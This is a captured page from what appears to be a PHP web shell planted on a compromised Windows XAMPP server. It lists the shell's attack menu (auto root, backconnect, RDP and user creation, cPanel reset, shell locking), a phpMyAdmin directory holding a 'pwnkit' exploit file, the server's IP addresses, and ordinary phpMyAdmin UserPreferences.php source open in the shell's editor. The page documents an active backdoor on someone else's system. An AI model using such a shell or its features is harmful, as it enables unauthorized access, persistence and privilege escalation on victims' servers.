Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 18.220.42.22
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
libraries /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
Charsets
[ DIR ]
drwxrwxrwx
Command
[ DIR ]
drwxrwxrwx
Config
[ DIR ]
drwxrwxrwx
ConfigStorage
[ DIR ]
drwxrwxrwx
Controllers
[ DIR ]
drwxrwxrwx
Crypto
[ DIR ]
drwxrwxrwx
Database
[ DIR ]
drwxrwxrwx
Dbal
[ DIR ]
drwxrwxrwx
Display
[ DIR ]
drwxrwxrwx
Engines
[ DIR ]
drwxrwxrwx
Exceptions
[ DIR ]
drwxrwxrwx
Export
[ DIR ]
drwxrwxrwx
Gis
[ DIR ]
drwxrwxrwx
Html
[ DIR ]
drwxrwxrwx
Http
[ DIR ]
drwxrwxrwx
Image
[ DIR ]
drwxrwxrwx
Import
[ DIR ]
drwxrwxrwx
Navigation
[ DIR ]
drwxrwxrwx
Partitioning
[ DIR ]
drwxrwxrwx
Plugins
[ DIR ]
drwxrwxrwx
Properties
[ DIR ]
drwxrwxrwx
Providers
[ DIR ]
drwxrwxrwx
Query
[ DIR ]
drwxrwxrwx
Server
[ DIR ]
drwxrwxrwx
Setup
[ DIR ]
drwxrwxrwx
Table
[ DIR ]
drwxrwxrwx
Twig
[ DIR ]
drwxrwxrwx
Utils
[ DIR ]
drwxrwxrwx
WebAuthn
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Advisor.php
12.32
KB
-rw-rw-rw-
Bookmark.php
9.19
KB
-rw-rw-rw-
BrowseForeigners.php
10.63
KB
-rw-rw-rw-
Cache.php
1.5
KB
-rw-rw-rw-
Charsets.php
6.82
KB
-rw-rw-rw-
CheckUserPrivileges.php
11.3
KB
-rw-rw-rw-
Common.php
19.4
KB
-rw-rw-rw-
Config.php
41.65
KB
-rw-rw-rw-
Console.php
3.25
KB
-rw-rw-rw-
Core.php
28.91
KB
-rw-rw-rw-
CreateAddField.php
15.83
KB
-rw-rw-rw-
DatabaseInterface.php
71.73
KB
-rw-rw-rw-
DbTableExists.php
2.86
KB
-rw-rw-rw-
Encoding.php
8.41
KB
-rw-rw-rw-
Error.php
13.63
KB
-rw-rw-rw-
ErrorHandler.php
18.63
KB
-rw-rw-rw-
ErrorReport.php
8.99
KB
-rw-rw-rw-
Export.php
45.7
KB
-rw-rw-rw-
FieldMetadata.php
11.11
KB
-rw-rw-rw-
File.php
19.75
KB
-rw-rw-rw-
FileListing.php
2.88
KB
-rw-rw-rw-
FlashMessages.php
1.22
KB
-rw-rw-rw-
Font.php
5.58
KB
-rw-rw-rw-
Footer.php
8.06
KB
-rw-rw-rw-
Git.php
18
KB
-rw-rw-rw-
Header.php
20
KB
-rw-rw-rw-
Import.php
48.72
KB
-rw-rw-rw-
Index.php
14.83
KB
-rw-rw-rw-
IndexColumn.php
4.75
KB
-rw-rw-rw-
InsertEdit.php
89.05
KB
-rw-rw-rw-
InternalRelations.php
17.31
KB
-rw-rw-rw-
IpAllowDeny.php
9.13
KB
-rw-rw-rw-
Language.php
4.47
KB
-rw-rw-rw-
LanguageManager.php
22.74
KB
-rw-rw-rw-
Linter.php
4.99
KB
-rw-rw-rw-
ListAbstract.php
1.67
KB
-rw-rw-rw-
ListDatabase.php
4.11
KB
-rw-rw-rw-
Logging.php
2.69
KB
-rw-rw-rw-
Menu.php
20.4
KB
-rw-rw-rw-
Message.php
18.68
KB
-rw-rw-rw-
Mime.php
918
B
-rw-rw-rw-
Normalization.php
41.53
KB
-rw-rw-rw-
OpenDocument.php
8.62
KB
-rw-rw-rw-
Operations.php
35.11
KB
-rw-rw-rw-
OutputBuffering.php
4.1
KB
-rw-rw-rw-
ParseAnalyze.php
2.34
KB
-rw-rw-rw-
Pdf.php
4.17
KB
-rw-rw-rw-
Plugins.php
21.83
KB
-rw-rw-rw-
Profiling.php
2.16
KB
-rw-rw-rw-
RecentFavoriteTable.php
11.44
KB
-rw-rw-rw-
Replication.php
4.81
KB
-rw-rw-rw-
ReplicationGui.php
21.24
KB
-rw-rw-rw-
ReplicationInfo.php
4.79
KB
-rw-rw-rw-
ResponseRenderer.php
13.5
KB
-rw-rw-rw-
Routing.php
6.55
KB
-rw-rw-rw-
Sanitize.php
11.98
KB
-rw-rw-rw-
SavedSearches.php
11.33
KB
-rw-rw-rw-
Scripts.php
3.74
KB
-rw-rw-rw-
Session.php
8.16
KB
-rw-rw-rw-
Sql.php
64.01
KB
-rw-rw-rw-
SqlQueryForm.php
6.74
KB
-rw-rw-rw-
StorageEngine.php
15.71
KB
-rw-rw-rw-
SystemDatabase.php
3.98
KB
-rw-rw-rw-
Table.php
90.33
KB
-rw-rw-rw-
Template.php
4.5
KB
-rw-rw-rw-
Theme.php
7.32
KB
-rw-rw-rw-
ThemeManager.php
7
KB
-rw-rw-rw-
Tracker.php
30.34
KB
-rw-rw-rw-
Tracking.php
36.11
KB
-rw-rw-rw-
Transformations.php
16.31
KB
-rw-rw-rw-
TwoFactor.php
7.49
KB
-rw-rw-rw-
Types.php
25.85
KB
-rw-rw-rw-
Url.php
10.61
KB
-rw-rw-rw-
UrlRedirector.php
1.74
KB
-rw-rw-rw-
UserPassword.php
6.86
KB
-rw-rw-rw-
UserPreferences.php
10.49
KB
-rw-rw-rw-
Util.php
86.45
KB
-rw-rw-rw-
Version.php
556
B
-rw-rw-rw-
VersionInformation.php
7.3
KB
-rw-rw-rw-
ZipExtension.php
10.33
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UserPreferences.php
<?php declare(strict_types=1); namespace PhpMyAdmin; use PhpMyAdmin\Config\ConfigFile; use PhpMyAdmin\Config\Forms\User\UserFormList; use PhpMyAdmin\ConfigStorage\Relation; use PhpMyAdmin\Dbal\DatabaseName; use function __; use function array_flip; use function array_merge; use function basename; use function htmlspecialchars; use function http_build_query; use function is_array; use function is_int; use function is_numeric; use function is_string; use function json_decode; use function json_encode; use function str_contains; use function time; use function urlencode; /** * Functions for displaying user preferences pages */ class UserPreferences { /** @var Relation */ private $relation; /** @var Template */ public $template; public function __construct() { global $dbi; $this->relation = new Relation($dbi); $this->template = new Template(); } /** * Common initialization for user preferences modification pages * * @param ConfigFile $cf Config file instance */ public function pageInit(ConfigFile $cf): void { $forms_all_keys = UserFormList::getFields(); $cf->resetConfigData(); // start with a clean instance $cf->setAllowedKeys($forms_all_keys); $cf->setCfgUpdateReadMapping( [ 'Server/hide_db' => 'Servers/1/hide_db', 'Server/only_db' => 'Servers/1/only_db', ] ); $cf->updateWithGlobalConfig($GLOBALS['cfg']); } /** * Loads user preferences * * Returns an array: * * config_data - path => value pairs * * mtime - last modification time * * type - 'db' (config read from pmadb) or 'session' (read from user session) * * @psalm-return array{config_data: mixed[], mtime: int, type: 'session'|'db'} */ public function load(): array { global $dbi; $relationParameters = $this->relation->getRelationParameters(); if ($relationParameters->userPreferencesFeature === null) { // no pmadb table, use session storage if (! isset($_SESSION['userconfig']) || ! is_array($_SESSION['userconfig'])) { $_SESSION['userconfig'] = ['db' => [], 'ts' => time()]; } $configData = $_SESSION['userconfig']['db'] ?? null; $timestamp = $_SESSION['userconfig']['ts'] ?? null; return [ 'config_data' => is_array($configData) ? $configData : [], 'mtime' => is_int($timestamp) ? $timestamp : time(), 'type' => 'session', ]; } // load configuration from pmadb $query_table = Util::backquote($relationParameters->userPreferencesFeature->database) . '.' . Util::backquote($relationParameters->userPreferencesFeature->userConfig); $query = 'SELECT `config_data`, UNIX_TIMESTAMP(`timevalue`) ts' . ' FROM ' . $query_table . ' WHERE `username` = \'' . $dbi->escapeString((string) $relationParameters->user) . '\''; $row = $dbi->fetchSingleRow($query, DatabaseInterface::FETCH_ASSOC, DatabaseInterface::CONNECT_CONTROL); if (! is_array($row) || ! isset($row['config_data']) || ! isset($row['ts'])) { return ['config_data' => [], 'mtime' => time(), 'type' => 'db']; } $configData = is_string($row['config_data']) ? json_decode($row['config_data'], true) : []; return [ 'config_data' => is_array($configData) ? $configData : [], 'mtime' => is_numeric($row['ts']) ? (int) $row['ts'] : time(), 'type' => 'db', ]; } /** * Saves user preferences * * @param array $config_array configuration array * * @return true|Message */ public function save(array $config_array) { global $dbi; $relationParameters = $this->relation->getRelationParameters(); $server = $GLOBALS['server'] ?? $GLOBALS['cfg']['ServerDefault']; $cache_key = 'server_' . $server; if ( $relationParameters->userPreferencesFeature === null || $relationParameters->user === null || $relationParameters->db === null ) { // no pmadb table, use session storage $_SESSION['userconfig'] = [ 'db' => $config_array, 'ts' => time(), ]; if (isset($_SESSION['cache'][$cache_key]['userprefs'])) { unset($_SESSION['cache'][$cache_key]['userprefs']); } return true; } // save configuration to pmadb $query_table = Util::backquote($relationParameters->userPreferencesFeature->database) . '.' . Util::backquote($relationParameters->userPreferencesFeature->userConfig); $query = 'SELECT `username` FROM ' . $query_table . ' WHERE `username` = \'' . $dbi->escapeString($relationParameters->user) . '\''; $has_config = $dbi->fetchValue($query, 0, DatabaseInterface::CONNECT_CONTROL); $config_data = json_encode($config_array); if ($has_config) { $query = 'UPDATE ' . $query_table . ' SET `timevalue` = NOW(), `config_data` = \'' . $dbi->escapeString($config_data) . '\'' . ' WHERE `username` = \'' . $dbi->escapeString($relationParameters->user) . '\''; } else { $query = 'INSERT INTO ' . $query_table . ' (`username`, `timevalue`,`config_data`) ' . 'VALUES (\'' . $dbi->escapeString($relationParameters->user) . '\', NOW(), ' . '\'' . $dbi->escapeString($config_data) . '\')'; } if (isset($_SESSION['cache'][$cache_key]['userprefs'])) { unset($_SESSION['cache'][$cache_key]['userprefs']); } if (! $dbi->tryQuery($query, DatabaseInterface::CONNECT_CONTROL)) { $message = Message::error(__('Could not save configuration')); $message->addMessage(Message::error($dbi->getError(DatabaseInterface::CONNECT_CONTROL)), '<br><br>'); if (! $this->hasAccessToDatabase($relationParameters->db)) { /** * When phpMyAdmin cached the configuration storage parameters, it checked if the database can be * accessed, so if it could not be accessed anymore, then the cache must be cleared as it's out of date. * * @psalm-suppress MixedArrayAssignment */ $_SESSION['relation'][$GLOBALS['server']] = []; $message->addMessage(Message::error(htmlspecialchars( __('The phpMyAdmin configuration storage database could not be accessed.') )), '<br><br>'); } return $message; } return true; } private function hasAccessToDatabase(DatabaseName $database): bool { $escapedDb = $GLOBALS['dbi']->escapeString($database->getName()); $query = 'SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = \'' . $escapedDb . '\';'; if ($GLOBALS['cfg']['Server']['DisableIS']) { $query = 'SHOW DATABASES LIKE \'' . Util::escapeMysqlWildcards($escapedDb) . '\';'; } return (bool) $GLOBALS['dbi']->fetchSingleRow($query, 'ASSOC', DatabaseInterface::CONNECT_CONTROL); } /** * Returns a user preferences array filtered by $cfg['UserprefsDisallow'] * (exclude list) and keys from user preferences form (allow list) * * @param array $config_data path => value pairs * * @return array */ public function apply(array $config_data) { $cfg = []; $excludeList = array_flip($GLOBALS['cfg']['UserprefsDisallow']); $allowList = array_flip(UserFormList::getFields()); // allow some additional fields which are custom handled $allowList['ThemeDefault'] = true; $allowList['lang'] = true; $allowList['Server/hide_db'] = true; $allowList['Server/only_db'] = true; $allowList['2fa'] = true; foreach ($config_data as $path => $value) { if (! isset($allowList[$path]) || isset($excludeList[$path])) { continue; } Core::arrayWrite($path, $cfg, $value); } return $cfg; } /** * Updates one user preferences option (loads and saves to database). * * No validation is done! * * @param string $path configuration * @param mixed $value value * @param mixed $default_value default value * * @return true|Message */ public function persistOption($path, $value, $default_value) { $prefs = $this->load(); if ($value === $default_value) { if (! isset($prefs['config_data'][$path])) { return true; } unset($prefs['config_data'][$path]); } else { $prefs['config_data'][$path] = $value; } return $this->save($prefs['config_data']); } /** * Redirects after saving new user preferences * * @param string $file_name Filename * @param array|null $params URL parameters * @param string $hash Hash value */ public function redirect( $file_name, $params = null, $hash = null ): void { // redirect $url_params = ['saved' => 1]; if (is_array($params)) { $url_params = array_merge($params, $url_params); } if ($hash) { $hash = '#' . urlencode($hash); } Core::sendHeaderLocation('./' . $file_name . Url::getCommonRaw($url_params, ! str_contains($file_name, '?') ? '?' : '&') . $hash); } /** * Shows form which allows to quickly load * settings stored in browser's local storage * * @return string */ public function autoloadGetHeader() { if (isset($_REQUEST['prefs_autoload']) && $_REQUEST['prefs_autoload'] === 'hide') { $_SESSION['userprefs_autoload'] = true; return ''; } $script_name = basename(basename($GLOBALS['PMA_PHP_SELF'])); $return_url = $script_name . '?' . http_build_query($_GET, '', '&'); return $this->template->render('preferences/autoload', [ 'hidden_inputs' => Url::getHiddenInputs(), 'return_url' => $return_url, ]); } }
Close
